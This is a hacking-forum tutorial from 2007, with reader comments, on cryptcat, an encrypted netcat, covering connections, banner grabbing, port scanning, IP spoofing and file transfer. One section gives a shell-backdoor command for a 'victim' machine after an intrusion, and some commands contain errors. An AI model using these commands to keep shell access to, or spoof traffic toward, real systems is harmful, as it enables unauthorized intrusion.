Follow us on Twitter!
Hacking isn't just Computers & Exploits. It's a Philosophy. - Mr_Cheese
Saturday, April 19, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 28
Guests Online: 24
Members Online: 4

Registered Members: 82839
Newest Member: fezphantom
Latest Articles

Cryptcat: Advanced Usage

Arrow Image Advanced Usage of the encrypt3d SwiSS army K.nife!



+=+=+=+=+=+=+=+=+=
Cryptcat: Advanced Usage
+=+=+=+=+=+=+=+=+=

++||||||> CRYPTCAT <|||||||||++

It is, basically, netcat with encryption (twofish) turned ON. So instead of having communications sent/received in clear text, you have it encrypted in twofish... So it doesn\'t get sniffed!

This tool is often referred to as the \"TCP/IP Swiss Army Knife\", because of its ability to establish various connections across networks.

So, if you\'ve ever used netcat, then it should be easy for you to use cryptcat. The Syntax for using command line is the same.

Let\'s start by explaining the basic usage of it, by examples, then move on to m0re compleX stuff:
______________________________________________________________

First, to establish a connection between two machines, we\'d go about this by:

-= making machine #1 (local/victim) listen on a port (with an IP of 192.168.1.1) =-

>$ crypcat -l -p 3333

-= Making machine #2 (remote/attacker) establish connection (from 192.168.1.2) =-

>$ cryptcat 192.168.1.1 3333
______________________________________________________________

You can also use cryptcat for banner grabbing, ie. for SNMTP servers:

>$ cryptcat 192.168.1.1 25
220 192.168.1.1 ESMTP Sendmail 8.10.2+Sun/8.10.2; Sun
19 Feb 2007 12:25:02 -0500 (EST)

this should connect you to the SNMTP server, and output the server\'s Name and Version.

______________________________________________________________

Can also use cryptcat as a script to banner grab, say on an HTTP server, as such:

>$ cryptcat hostname 80 < get_reqst.txt

set get_reqst.txt to contain the following script:

HEAD / HTTP/1.0[ENTER]
[ENTER]

(don\'t actually type in [ENTER], rather, just press it twice) duh!.

OR --- try (from the SHELL):

>$ echo -e \"GET 192.168.1.1 HTTP/1.0nn\" | cryptcat –w 5 192.168.1.1 80

______________________________________________________________

Say, instead of using a ROOTKIT after intruding on a computer, you can simply use cryptcat to get a SHELL every time you connect to a port you specify for the local machine to listen onto with cryptcat. This is a simple backd00r. To do this, simply type on the local/victim machine:

>$ cryptcat -e /bin/sh -l -p 9999

(that\'s assuming the user is using UNIX)
Now, as the attacker, all you need to do is either connect from your machine (or locally) to the victim, then that should spawn a shell for j00.

>$ cryptcat 192.168.1.1 9999 -e /bin/sh

______________________________________________________________

You can even make cryptcat act like a PORT SCANNER with:

>$ cryptcat -v -z 192.168.1.1 1-9999

this scans 192.168.1.1 for ports 1 to 9999

______________________________________________________________

Also, you can use it to sp00f your source IP Address:

>$ cryptcat -s 69.13.37.69 192.168.1.1

remember, the sp00fed IP address (69.13.37.69) come before the remote IP address (192.168.1.1). This causes the remote host to respond back to the sp00fed IP address. Don\'t start thinking of how malicious you can be with this!

______________________________________________________________

Ah, yes, and one of my favourites... Transfering Files. To do this, simply, set a computer (not necessarily a victim) to host a file (take_me.txt):

>$ cryptcat -v -l -p 9999 < take_me.txt

Now, to get take_me.txt, all we do on the client is:

>$ cryptcat -v 192.168.1.1 9999 take_me.txt

Note: 192.168.1.1 is still the server/victim.
______________________________________________________________

And finally, you can use it for source-routing to connect to a port on a remote host:

>$ cryptcat -g 69.13.37.69 192.168.1.1 9999

Note: 69.13.37.69 is gateway we\'re going through to connect to 192.168.1.1 to port 9999

LINKS
HOMEPAGE: http://farm9.org/Cryptcat/
Download: http://sourceforge.net/projects/cryptcat/
Man Page: http://www.phlak.org/docs/tools/cryptcat.txt

Hope you learned s0mething at least. Expect more! And ...

Always Remember!
1: Netfish is RIGHT.
2: If {you think Netfish is WRONG} then SLAP YOURSELF, and goto the FIRST POINT.

Comments

only_samuraion February 19 2007 - 14:44:48
yet another badass article by the netfish.... let noone say he doesnt contribute. .... lol netfish.... enjoyed the article tho.... :ninja:
HardHackzon February 19 2007 - 15:23:15
o.0 A little confused, next time explain the O/S, that it's unix, etc. Good job though.
nights_shadowon February 19 2007 - 17:52:03
Interesting, never even heard of cryptcat, good read.
-The_Flash-on February 19 2007 - 19:45:37
Keep up the great articles dude. Awesome to read something worthwhile
netfishon February 19 2007 - 23:35:21
@HardHackz ... no need to explain what OS it is for, it has ports to pretty much all the main ones comprising of, Windows NT, BSD and Linux. The syntax remains the same on all those platforms too.
end3ron February 21 2007 - 03:36:52
good article, nice info.
sleazoidon February 21 2007 - 03:51:14
nice work man!:happy:
sirus69on March 06 2007 - 08:15:05
waste of time
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.